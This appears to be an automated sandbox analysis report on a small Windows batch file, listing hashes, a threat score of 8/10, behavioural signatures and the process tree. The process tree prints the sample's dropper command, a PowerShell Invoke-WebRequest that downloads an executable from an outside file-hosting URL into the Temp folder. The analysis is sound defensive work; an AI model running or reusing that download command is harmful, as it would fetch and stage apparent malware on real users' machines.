Analysis
-
max time kernel
121s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
10-07-2024 18:51
Static task
static1
Behavioral task
behavioral1
Sample
bat.bat
Resource
win7-20240705-en
windows7-x64
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
bat.bat
Resource
win10v2004-20240709-en
windows10-2004-x64
20 signatures
150 seconds
General
-
Target
bat.bat
-
Size
306B
-
MD5
b356ccb6be21d42492bb19158842f90c
-
SHA1
e79f4a517f48a992dedb66df06bb57606d86588e
-
SHA256
269a98ecf1766f39c6ed52aedda0f97276a8b1ec0e5e824d30fd40c3a67a8897
-
SHA512
52422b3fbe34dec6f54366388d20964812bb038f900fc00f80875b1f1d0427470d23bd7a62c7ae068f1cbb795877f0ce32dd00dc868a258a16a3a92b5610b002
Score
8/10
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid Process 2380 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid Process Token: SeDebugPrivilege 2380 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid Process procid_target PID 1812 wrote to memory of 2380 1812 cmd.exe 31 PID 1812 wrote to memory of 2380 1812 cmd.exe 31 PID 1812 wrote to memory of 2380 1812 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\bat.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://f004.backblazeb2.com/b2api/v1/b2_download_file_by_id?fileId=4_z91af74acda9d97d09c090616_f1112212a7aa57525_d20240710_m181411_c004_v0402023_t0026_u01720635251213' -OutFile 'C:\Users\Admin\AppData\Local\Temp\lb.exe'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2380
-